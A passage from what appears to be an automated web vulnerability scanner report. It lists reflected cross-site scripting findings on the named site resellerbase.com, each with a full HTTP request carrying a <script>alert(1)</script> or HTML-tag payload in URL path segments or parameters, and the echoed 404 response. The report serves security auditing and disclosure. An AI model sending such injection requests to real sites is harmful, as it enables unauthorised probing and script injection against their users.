Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/rating.php?12cce<script>alert(1)</script>99539ab88ce=1 was not found on this server.</p>
...[SNIP]...

2.2736. http://www.resellerbase.com/detail/4/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 173d2<script>alert(1)</script>a05e87559374cdfba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/4/rating.php/173d2<script>alert(1)</script>a05e87559374cdfba?id=4&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/rating.php/173d2<script>alert(1)</script>a05e87559374cdfba?id=4&rating=5 was not found on this server.</p>
...[SNIP]...

2.2737. http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/reseller-targetdomain-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4a913<script>alert(1)</script>01e1251bf5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4a913<script>alert(1)</script>01e1251bf5d/4/reseller-targetdomain-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4a913<script>alert(1)</script>01e1251bf5d/4/reseller-targetdomain-com.html was not found on this server.</p>
...[SNIP]...

2.2738. http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/reseller-targetdomain-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 53bc8<script>alert(1)</script>5eb6cd2b67d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/53bc8<script>alert(1)</script>5eb6cd2b67d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/53bc8<script>alert(1)</script>5eb6cd2b67d was not found on this server.</p>
...[SNIP]...

2.2739. http://www.resellerbase.com/detail/4/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ca9b7<script>alert(1)</script>7fae60f06da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailca9b7<script>alert(1)</script>7fae60f06da/4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailca9b7<script>alert(1)</script>7fae60f06da/4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2740. http://www.resellerbase.com/detail/4/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d76d5<script>alert(1)</script>42007c6ea23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4d76d5<script>alert(1)</script>42007c6ea23/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4d76d5<script>alert(1)</script>42007c6ea23/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2741. http://www.resellerbase.com/detail/4/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 988ae<script>alert(1)</script>bcb364a9bf1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/search.php988ae<script>alert(1)</script>bcb364a9bf1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/search.php988ae<script>alert(1)</script>bcb364a9bf1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2742. http://www.resellerbase.com/detail/4/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 5a96f<a>0d69808efe1 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/search.php?keyword=search...&Submit3=Search5a96f<a>0d69808efe1&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/search.php?keyword=search...&Submit3=Search5a96f<a>0d69808efe1&opt=2 was not found on this server.</p>
...[SNIP]...

2.2743. http://www.resellerbase.com/detail/4/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 68996<a>a2ecc8bed43 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/search.php?keyword=search...68996<a>a2ecc8bed43&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/search.php?keyword=search...68996<a>a2ecc8bed43&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2744. http://www.resellerbase.com/detail/4/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 445b3<script>alert(1)</script>702b6d5f3e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/search.php?keyword=search...&Submit3=Search&opt=2&445b3<script>alert(1)</script>702b6d5f3e1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/search.php?keyword=search...&Submit3=Search&opt=2&445b3<script>alert(1)</script>702b6d5f3e1=1 was not found on this server.</p>
...[SNIP]...

2.2745. http://www.resellerbase.com/detail/4/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4d7a2<a>56878e76282 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/search.php?keyword=search...&Submit3=Search&opt=24d7a2<a>56878e76282 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/search.php?keyword=search...&Submit3=Search&opt=24d7a2<a>56878e76282 was not found on this server.</p>
...[SNIP]...

2.2746. http://www.resellerbase.com/detail/4/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69004<script>alert(1)</script>84a7a60ac9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail69004<script>alert(1)</script>84a7a60ac9a/4/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail69004<script>alert(1)</script>84a7a60ac9a/4/themes/ was not found on this server.</p>
...[SNIP]...

2.2747. http://www.resellerbase.com/detail/4/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9e5e<script>alert(1)</script>2a40d0094e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4f9e5e<script>alert(1)</script>2a40d0094e0/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4f9e5e<script>alert(1)</script>2a40d0094e0/themes/ was not found on this server.</p>
...[SNIP]...

2.2748. http://www.resellerbase.com/detail/4/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9991d<script>alert(1)</script>3725d9b25cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes9991d<script>alert(1)</script>3725d9b25cd/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes9991d<script>alert(1)</script>3725d9b25cd/ was not found on this server.</p>
...[SNIP]...

2.2749. http://www.resellerbase.com/detail/4/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 43490<script>alert(1)</script>ca44b3f86c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/?43490<script>alert(1)</script>ca44b3f86c0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/?43490<script>alert(1)</script>ca44b3f86c0=1 was not found on this server.</p>
...[SNIP]...

2.2750. http://www.resellerbase.com/detail/4/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ed74<script>alert(1)</script>d99953cd2e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5ed74<script>alert(1)</script>d99953cd2e2/4/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5ed74<script>alert(1)</script>d99953cd2e2/4/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2751. http://www.resellerbase.com/detail/4/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66acd<script>alert(1)</script>5bd907d3560 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/466acd<script>alert(1)</script>5bd907d3560/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/466acd<script>alert(1)</script>5bd907d3560/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2752. http://www.resellerbase.com/detail/4/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cf154<script>alert(1)</script>21f61561a02 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themescf154<script>alert(1)</script>21f61561a02/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themescf154<script>alert(1)</script>21f61561a02/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2753. http://www.resellerbase.com/detail/4/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 26da0<script>alert(1)</script>6555e8f7fcb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos26da0<script>alert(1)</script>6555e8f7fcb/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos26da0<script>alert(1)</script>6555e8f7fcb/ was not found on this server.</p>
...[SNIP]...

2.2754. http://www.resellerbase.com/detail/4/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c47ce<script>alert(1)</script>df9e5a081a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/?c47ce<script>alert(1)</script>df9e5a081a3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

